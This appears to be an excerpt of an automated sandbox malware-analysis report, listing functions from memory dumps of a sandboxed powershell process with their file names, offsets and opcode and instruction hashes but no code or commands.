                                                                    • Opcode Fuzzy Hash: 05f7d2084d171741ecfec3c1df351999cae4332b77e66a75070663d28c9ce988
                                                                    • Instruction Fuzzy Hash: C5F05E397055908FC7118F6DD494CA6BFF5AFCA31532944DAE186CB372CAA1DC06DB50
                                                                    Function 030BD998 Relevance: .0, Instructions: 33COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2350242370.00000000030BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 030BD000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_30bd000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c560389fe1d34fbf949272aea77986b2e79d5204d0fa450e2878a1066818de85
                                                                    • Instruction ID: 075127160d96e4cf4af1cede8e3947b4964eda3c55e7276b5b3fcbf4a66f7482
                                                                    • Opcode Fuzzy Hash: c560389fe1d34fbf949272aea77986b2e79d5204d0fa450e2878a1066818de85
                                                                    • Instruction Fuzzy Hash: BBF0F975100A40AFD765CF06CD85D63BBB9EB85660B198599A84A4B722C671FC42CBA0
                                                                    Function 04B09158 Relevance: .0, Instructions: 33COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9807702d68d15a0dc04d835005d92c03159f3ade0b6b7472f9cf5c4c24d1213e
                                                                    • Instruction ID: 7aa7e7dcaaa2c5a3732ac45cce5aa52d167fb77cd38d0bc2ca348b8a44af8dba
                                                                    • Opcode Fuzzy Hash: 9807702d68d15a0dc04d835005d92c03159f3ade0b6b7472f9cf5c4c24d1213e
                                                                    • Instruction Fuzzy Hash: 5AF06D315093444FD710DBB8D4A87AABBE8EB02210F14449ED54EC7292CB356881CBA0
                                                                    Function 04B07950 Relevance: .0, Instructions: 33COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3606244f564ea780897b107b8a696f0518ca016c437f05a6a94f9a8b3df9d961
                                                                    • Instruction ID: 81e93380b844bbd73b5a94e1f56526f7aeaa0fe4b6e2a54281dc9af1149fe034
                                                                    • Opcode Fuzzy Hash: 3606244f564ea780897b107b8a696f0518ca016c437f05a6a94f9a8b3df9d961
                                                                    • Instruction Fuzzy Hash: 4FF0A731700614AFDB149A59D844AAFBBE9EBC9661B10052DE10DD3740DF74BC4187A0
                                                                    Function 04B0767F Relevance: .0, Instructions: 31COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2b46410ff9258d2b5487e4467d933eccb35b9c795b4a0203d4541895f949e54f
                                                                    • Instruction ID: 46c1c6476f739f6190c7c2308df91925c0e5f7138458b00bcdf4258625cc06e5
                                                                    • Opcode Fuzzy Hash: 2b46410ff9258d2b5487e4467d933eccb35b9c795b4a0203d4541895f949e54f
                                                                    • Instruction Fuzzy Hash: 01F0A0393001048FDB00EBADD8409E9BBE6EFC87567158194E70ACB391EF30EC024B90
                                                                    Function 04B090E8 Relevance: .0, Instructions: 31COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 27bab172346f98a52f1814ac5afb6793082d3879ec53632c24588bc5672a157d
                                                                    • Instruction ID: f5a3bf4a526bdd700fe16f4ad5a05905dbf387ef8b4972e50a4ef1a205e209b0
                                                                    • Opcode Fuzzy Hash: 27bab172346f98a52f1814ac5afb6793082d3879ec53632c24588bc5672a157d
                                                                    • Instruction Fuzzy Hash: 86F02739A002044BE300EF68C0183EB77A6DBC1315F2081AED50A4B384CF397C02CBE0
                                                                    Function 04B0896A Relevance: .0, Instructions: 31COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 429703814fb0391ad89596562cd15d764890df91db0fa692d1d23358244a2851
                                                                    • Instruction ID: 41d0a12b7ed84ca4931bd7318b6f1ed526425a2cec86dee1af0db41da086e079
                                                                    • Opcode Fuzzy Hash: 429703814fb0391ad89596562cd15d764890df91db0fa692d1d23358244a2851
                                                                    • Instruction Fuzzy Hash: 46F0BE352082845FCB0AE775E4682A97BA1EF87225B0900AFD6058B283CF255806C7A1
                                                                    Function 04B0DE48 Relevance: .0, Instructions: 30COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c218efdd97dcd38e38245ccf658abe32c45702105fa7eb95ed2117b18d9bec95
                                                                    • Instruction ID: 0e7c4ed05dc4209a09300ed077653dff6824bbd174c3cd56a06647ccdb504cd3
                                                                    • Opcode Fuzzy Hash: c218efdd97dcd38e38245ccf658abe32c45702105fa7eb95ed2117b18d9bec95
                                                                    • Instruction Fuzzy Hash: 43E01A353005108F87109F5DD498CA6BBFAEFCE76671944AAE649CB371DA61EC01CB90
                                                                    Function 04B0E92E Relevance: .0, Instructions: 29COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cbb01cf98543f1c00b7baf0ff2fa75e9d8774cef3dddbd49d83d7b879f0b2e6e
                                                                    • Instruction ID: e4c9334b8d244917dcf2b68709cc3df6d28cc7ee0d644fb8a417e5ba33a7b1ff
                                                                    • Opcode Fuzzy Hash: cbb01cf98543f1c00b7baf0ff2fa75e9d8774cef3dddbd49d83d7b879f0b2e6e
                                                                    • Instruction Fuzzy Hash: 3DF07F39A02114DFCB00CF98E585D9DFBB2FB48315B29859AF905A7352CB31ED01DB50
                                                                    Function 04B0AF88 Relevance: .0, Instructions: 28COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 31eaa57f747f543020fbe856324033e5cd0503336736b2f30ccacffd137ea8f4
                                                                    • Instruction ID: 8ba363a6bd7d7157660a971fc797d90b2ccd3d35d3291bf01f09eb3fa2f0506a
                                                                    • Opcode Fuzzy Hash: 31eaa57f747f543020fbe856324033e5cd0503336736b2f30ccacffd137ea8f4
                                                                    • Instruction Fuzzy Hash: BCE0923270D3D11F8B16C27DA4A05A6BF778AE722130C85FEE041CF292CD515806C760
                                                                    Function 04B09549 Relevance: .0, Instructions: 25COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 080df562dc9360a7ec20b6320977b39cdd0a0d81eec9080fb55d3f402e465632
                                                                    • Instruction ID: d3cb39f622cf268131b2f8a2da67312f19669ebadedc68d6132254204a94b217
                                                                    • Opcode Fuzzy Hash: 080df562dc9360a7ec20b6320977b39cdd0a0d81eec9080fb55d3f402e465632
                                                                    • Instruction Fuzzy Hash: 99E0C222B0212117172835BE24006BB9DDA8AC20AB706C2BAE906C72C2EC90DC0903E0
                                                                    Function 04B09168 Relevance: .0, Instructions: 25COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d0545fbe02d5b483b4dd092394c96d96d46ea1249970b28dcf03500b0b146ad3
                                                                    • Instruction ID: 223a0f27354dcdfcd6abdcf856117f499bc121b543dd995f59b45af79fede3f9
                                                                    • Opcode Fuzzy Hash: d0545fbe02d5b483b4dd092394c96d96d46ea1249970b28dcf03500b0b146ad3
                                                                    • Instruction Fuzzy Hash: 38F06D70A013049BD760DFB8D49C79ABBE9EB44310F10446EE60EC7381DB356880CB90
                                                                    Function 04B08978 Relevance: .0, Instructions: 24COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6c8b84aafcea430e8b22640ec7bbd8358e1938f6e93444e43c6f6453d1faef8e
                                                                    • Instruction ID: 50832da860c1c6a9ec3b9358e6775350de9f9b09c5a24d8e8172abd363c4e6a8
                                                                    • Opcode Fuzzy Hash: 6c8b84aafcea430e8b22640ec7bbd8358e1938f6e93444e43c6f6453d1faef8e
                                                                    • Instruction Fuzzy Hash: 0CE0DF3570421447CF09B775A42C2AEBA96EBC9725F09006FD70A83382CF78580183D5
                                                                    Function 04B09550 Relevance: .0, Instructions: 23COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7da9c40a6ff48bf0669d4d1423dd18bd127c946562451861733a941aff3e84ff
                                                                    • Instruction ID: bb836587f411c46597c266a48474f58959910880cc68a5dd02f943405a750bd6
                                                                    • Opcode Fuzzy Hash: 7da9c40a6ff48bf0669d4d1423dd18bd127c946562451861733a941aff3e84ff
                                                                    • Instruction Fuzzy Hash: 6ED05E1270222117166834BA28006BBADDECAC54A7706C1B6EA09C32C2EC40ED0903F5
                                                                    Function 04B0DCE8 Relevance: .0, Instructions: 23COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                    • Instruction ID: 540e18cdf41f1d39a5867493e25c2c6a77f03ee82b57cc587ddea766d03ab610
                                                                    • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                    • Instruction Fuzzy Hash: 07E08631B10014978B089999D4144EDFBAAEBCC221F04C47AD90AA7380DA32691586E1
                                                                    Function 04B08739 Relevance: .0, Instructions: 22COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7caf71849cca986780b1fa4e2ba1e1c2d8606b64c94c32ebdac3566df4419303
                                                                    • Instruction ID: 3fc4cdafd4c88fa4d52226dcd7c49a3c9a640027b3f9060f05c06332762995d0
                                                                    • Opcode Fuzzy Hash: 7caf71849cca986780b1fa4e2ba1e1c2d8606b64c94c32ebdac3566df4419303
                                                                    • Instruction Fuzzy Hash: 82E01231808145CFCF09EFB4E46A9AD7F30EB16311B1541ADD51397293DB711546CF81
                                                                    Function 04B08800 Relevance: .0, Instructions: 21COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 08f176f1bdd45e74cece0d4f6242547a7347a6940309e2224ca0b3e40f30bdbe
                                                                    • Instruction ID: 469a59f3b52942c106f6ae3eb182ce35f71b90683fc1e54e6659e8f097bd79ee
                                                                    • Opcode Fuzzy Hash: 08f176f1bdd45e74cece0d4f6242547a7347a6940309e2224ca0b3e40f30bdbe
                                                                    • Instruction Fuzzy Hash: F2E0D83590824A8FCB44DFB4D092669BFB0EB06304B1840ADDE0587352EB305801CB90
                                                                    Function 04B0F460 Relevance: .0, Instructions: 18COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 07d9a3a53597c60ff3920e68f6151ac351fe4d7d38d5a28ba8c47aefc1ccd8a6
                                                                    • Instruction ID: 7d020ca1bb0cdd2fdcc1c32928734aee26d675c27984bf69039aa21679d608e4
                                                                    • Opcode Fuzzy Hash: 07d9a3a53597c60ff3920e68f6151ac351fe4d7d38d5a28ba8c47aefc1ccd8a6
                                                                    • Instruction Fuzzy Hash: E5E01A70E442469F8B94DFAC88415A9FFF0EB5A240B2485AEC909D6205E6324612CB81
                                                                    Function 04B0F470 Relevance: .0, Instructions: 16COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                    • Instruction ID: b79a92532275315b8ecff211f4b576e81dc0dbee701a748e723e7d5dd43d1735
                                                                    • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                    • Instruction Fuzzy Hash: C9D067B0E042099F8790EFADC94156EFFF4EB48204F64C5AA8919E7341F7729A12CBD1
                                                                    Function 04B08748 Relevance: .0, Instructions: 15COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5eaa4b2354a81d4c83db55bbbb24b219c8296dd16923454c4d0ff5028ca9879c
                                                                    • Instruction ID: 3c43f09366f6507a54fd18b12a1f6441ce0d9662f38ae383af16bae477e66305
                                                                    • Opcode Fuzzy Hash: 5eaa4b2354a81d4c83db55bbbb24b219c8296dd16923454c4d0ff5028ca9879c
                                                                    • Instruction Fuzzy Hash: E9D017308041098BCF48EBA4E82B4BDBB34FA10302F5141AED91752292EE302A4ACBC1
                                                                    Function 04B08810 Relevance: .0, Instructions: 15COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 23ff806c615a6be6ee0c3e9c3b17187f4a795aca88064d80813159297236bab5
                                                                    • Instruction ID: 32f7b9cf2639d166c1a6427827b1df908d337c8d0d714508138e51cfd7d4f147
                                                                    • Opcode Fuzzy Hash: 23ff806c615a6be6ee0c3e9c3b17187f4a795aca88064d80813159297236bab5
                                                                    • Instruction Fuzzy Hash: 03D01734A0820A8B8B48EFA8E45686EBFB5EB44301F10816ADE0993391EA306901CBC1
                                                                    Function 04B0EA57 Relevance: .0, Instructions: 14COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2284a6e1986adb734639a0645ab88b997035cd094a9572dde68f8956cc5f0a75
                                                                    • Instruction ID: 654f4e6a8ca7d8da1386fc1b1fde3a0c5e1920e7002b98c38fe217726179ff69
                                                                    • Opcode Fuzzy Hash: 2284a6e1986adb734639a0645ab88b997035cd094a9572dde68f8956cc5f0a75
                                                                    • Instruction Fuzzy Hash: 6CD09239B41218CFDB04CB98E895A9DF771FB8432AF2584A6E51997251CB32E952CB40
                                                                    Function 04B07E90 Relevance: .0, Instructions: 13COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8c9bd6e7264eed6c42f2ba9fc3af641d27c160f16e51698ded46edf768efff76
                                                                    • Instruction ID: c4fb42faa0c339ca868db7fb0f6a8e673740fe9adaf32cd38ce8f4962f0a4ce2
                                                                    • Opcode Fuzzy Hash: 8c9bd6e7264eed6c42f2ba9fc3af641d27c160f16e51698ded46edf768efff76
                                                                    • Instruction Fuzzy Hash: 7BC08C306083804FEF06C734CCB1510BFB29F8720030605C2E942CB2F2CD249C10D742
                                                                    Function 04B0791A Relevance: .0, Instructions: 13COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2fced1b79630439e23e30f28aee752f6b0151d7acc5b7bd8531080c79a67b45e
                                                                    • Instruction ID: 5dfc7d7d2a94472dceea9dcff8c23c73963a422a90e83457885a2de039aac5c3
                                                                    • Opcode Fuzzy Hash: 2fced1b79630439e23e30f28aee752f6b0151d7acc5b7bd8531080c79a67b45e
                                                                    • Instruction Fuzzy Hash: DAD092342492848FC70A9F74D9A48103F76EF8220530608DAE04A8FAF2CA75A886DB10
                                                                    Function 04B07928 Relevance: .0, Instructions: 8COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 04bf897c4b4839f9de83288fae819f6364faa042b72c015177ec4a5584a25fa8
                                                                    • Instruction ID: 63be9a01cd3f4c4257c15d4a1ff04ba3d5e8177c1e98b8f8de20de05c2289da5
                                                                    • Opcode Fuzzy Hash: 04bf897c4b4839f9de83288fae819f6364faa042b72c015177ec4a5584a25fa8
                                                                    • Instruction Fuzzy Hash: 55B092301857488FC6486F75A804814732DAB4061539004A8E80E4A6A2CE7AE9C5CA44

                                                                    Non-executed Functions

                                                                    Function 04B04D62 Relevance: 6.4, Strings: 5, Instructions: 107COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Cn^$Cn^$Cn^$Cn^$Cn^
                                                                    • API String ID: 0-3676415506
                                                                    • Opcode ID: bae195cc8ae3f4480bf1fe7d649255df894fb4dfab1b1ec2f5331eaa6f38a934
                                                                    • Instruction ID: 48d1b98127d0960ecb246d1dcec3c87dde4370e144b2ba04d593cee75b16945f
                                                                    • Opcode Fuzzy Hash: bae195cc8ae3f4480bf1fe7d649255df894fb4dfab1b1ec2f5331eaa6f38a934
                                                                    • Instruction Fuzzy Hash: 594172216093C19FC307DB3DD4986953FE0AFAB298B0A40DBD1C4CF2A3DA649C1AC752